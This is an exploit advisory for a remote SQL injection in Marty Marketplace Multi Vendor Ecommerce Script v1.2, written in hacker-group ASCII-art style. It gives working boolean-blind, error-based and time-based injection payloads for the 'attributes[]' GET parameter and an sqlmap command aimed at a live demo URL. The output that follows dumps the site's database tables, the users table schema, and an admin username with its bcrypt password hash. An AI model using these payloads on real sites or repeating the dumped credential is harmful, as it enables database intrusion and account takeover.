┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : sangvish.com │ │ │ │ Vendor : SangVish Technologies │ │ │ │ Software : Marty Marketplace Multi Vendor │ │ Open Source Marketplace PHP script for │ │ Ecommerce Script v1.2 │ │ eCommerce marketplace platforms │ │ Vuln Type: Remote SQL Injection │ │ in the market │ │ Method : GET │ │ │ │ Impact : Database Access │ │ │ │ │ │ │ │────────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear CryptoJob (Twitter) twitter.com/CryptozJob Special Greetz to The Lebanese National Basketball Team for the results of the FIBA Asia Cup ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'attributes[]' is vulnerable --- Parameter: attributes[] (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END)) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn) --- Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6 [+] Starting the Attack sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch [+] fetching current database [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.6 [INFO] retrieved: 'garudan_buy2marty' current database: 'garudan_buy2marty' [+] fetching tables for database: 'garudan_buy2marty' Database: garudan_buy2marty [105 tables] +----------------------------------------+ | activations | | ads | | ads_translations | | audit_histories | | categories | | categories_translations | | contact_replies | | contacts | | dashboard_widget_settings | | dashboard_widgets | | ec_brands | | ec_brands_translations | | ec_cart | | ec_currencies | | ec_customer_addresses | | ec_customer_password_resets | | ec_customers | | ec_discount_customers | | ec_discount_product_collections | | ec_discount_products | | ec_discounts | | ec_flash_sale_products | | ec_flash_sales | | ec_flash_sales_translations | | ec_grouped_products | | ec_order_addresses | | ec_order_histories | | ec_order_product | | ec_orders | | ec_product_attribute_sets | | ec_product_attribute_sets_translations | | ec_product_attributes | | ec_product_attributes_translations | | ec_product_categories | | ec_product_categories_translations | | ec_product_category_product | | ec_product_collection_products | | ec_product_collections | | ec_product_collections_translations | | ec_product_cross_sale_relations | | ec_product_label_products | | ec_product_labels | | ec_product_labels_translations | | ec_product_related_relations | | ec_product_tag_product | | ec_product_tags | | ec_product_tags_translations | | ec_product_up_sale_relations | | ec_product_variation_items | | ec_product_variations | | ec_product_with_attribute | | ec_product_with_attribute_set | | ec_products | | ec_products_translations | | ec_reviews | | ec_shipment_histories | | ec_shipments | | ec_shipping | | ec_shipping_rule_items | | ec_shipping_rules | | ec_store_locators | | ec_taxes | | ec_wish_lists | | failed_jobs | | faq_categories | | faq_categories_translations | | faqs | | faqs_translations | | jobs | | language_meta | | languages | | media_files | | media_folders | | media_settings | | menu_locations | | menu_nodes | | menus | | meta_boxes | | migrations | | mp_customer_revenues | | mp_customer_withdrawals | | mp_stores | | mp_vendor_info | | newsletters | | pages | | pages_translations | | password_resets | | payments | | post_categories | | post_tags | | posts | | posts_translations | | revisions | | role_users | | roles | | settings | | simple_slider_items | | simple_sliders | | slugs | | tags | | tags_translations | | translations | | user_meta | | users | | widgets | +----------------------------------------+ [+] fetching columns for table 'users' in database 'garudan_buy2marty' Database: garudan_buy2marty Table: users [15 columns] +-------------------+---------------------+ | Column | Type | +-------------------+---------------------+ | avatar_id | int(10) unsigned | | created_at | timestamp | | email | varchar(191) | | email_verified_at | timestamp | | first_name | varchar(191) | | id | bigint(20) unsigned | | last_login | timestamp | | last_name | varchar(191) | | manage_supers | tinyint(1) | | password | varchar(191) | | permissions | text | | remember_token | varchar(100) | | super_user | tinyint(1) | | updated_at | timestamp | | username | varchar(60) | +-------------------+---------------------+ [+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty' Database: garudan_buy2marty Table: users [1 entry] +----+----------+--------------------------------------------------------------+------------+-------------+ | id | username | password | super_user | permissions | +----+----------+--------------------------------------------------------------+------------+-------------+ | 1 | admin | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1 | NULL | +----+----------+--------------------------------------------------------------+------------+-------------+ Possible algorithms: bcrypt $2*$, Blowfish (Unix) [-] Done